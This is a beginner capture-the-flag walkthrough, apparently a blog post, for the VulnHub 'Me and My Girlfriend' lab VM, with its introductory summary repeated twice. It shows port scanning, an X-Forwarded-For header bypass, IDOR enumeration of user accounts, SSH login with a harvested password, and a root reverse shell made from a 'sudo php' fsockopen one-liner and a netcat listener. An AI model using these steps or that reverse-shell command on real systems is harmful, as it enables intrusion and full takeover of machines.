Hello Everyone, let's begin
ctf link : https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
download link :https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova
I opened it with Virtualbox in bridged network.
CTF level : Beginner
Vulnerabilities to exploit: x-forwarded-for header, IDOR, sudo permission with no password
Technique and tools: Nmap, Firefox, Header Editor, terminal, ssh, php socket, netcat
It started with ctf descriptions
I used php socket on ctf machine through alice ssh connection.
Note :Instead of 192.168.0.111 use your own machine IP address.
Finally, got root access.
I used find to get flag location (I knew flag names)
Using cat command, I read those flags.
Thank you
ctf link : https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
download link :https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova
I opened it with Virtualbox in bridged network.
CTF level : Beginner
Vulnerabilities to exploit: x-forwarded-for header, IDOR, sudo permission with no password
Technique and tools: Nmap, Firefox, Header Editor, terminal, ssh, php socket, netcat
It started with ctf descriptions
I noticed that "Alice" is a clue to begin with.
After starting this machine, I found out IP of the machine using
sudo arp-scan --local
I found IP of the ctf machine 192.168.0.184
I started scanning well-known 1000 ports and banner grabbing using nmap
sudo nmap -sSV 192.168.0.184
I saw two service active in the network of ctf machine
22/tcp Openssh 6.6.1p1
80/tcp Apache httpd 2.47
I also tried nmap --script vuln 192.168.0.184, but found nothing useful.
As I saw port 80 open, I opened http service in firefox. It is telling that there's something which can be accessed from local machine.
But I found something in Source code of the same page.
In html comment, It is asking to use x-forwarded-for header. To manipulate header file, I am using Header Editor firefox extension. I added a new rule. Now I can access those stuff from here.
After adding custom header, Irefreshed the webpage and I saw login and Register options. I registered and logged in using the same credential. I clicked on proflie option and I found something interesting there in url : http://192.168.0.184/index.php?page=profile&user_id=15 . On changing user_id, it shows me other users account also. It's IDOR. I kept fuzzing till I saw Alice account (user_id=5).
Using Inspect element, I was able to see the password. I picked username and password and tried a luck with SSH.
ssh alice@192.168.0.184
Huh, It was easy. Now it's time to look for flags and privilege escalation. I prefer to escalate privilege first.
I started seeing id, groups and sudo permission.
id
groups
sudo -l
And I found that Alice can use php as root without password.
At first I started listening using netcat on my machine on port 1234 (I'll use same port in socket for reverse connection)
nc -lvp 1234
I used php socket on ctf machine through alice ssh connection.
Note :Instead of 192.168.0.111 use your own machine IP address.
sudo php -r '$sock=fsockopen("192.168.0.111",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
Finally, got root access.
I used find to get flag location (I knew flag names)
find / -name flag1.txt
find / -name flag2.txt
Using cat command, I read those flags.
Thank you
Comments
Post a Comment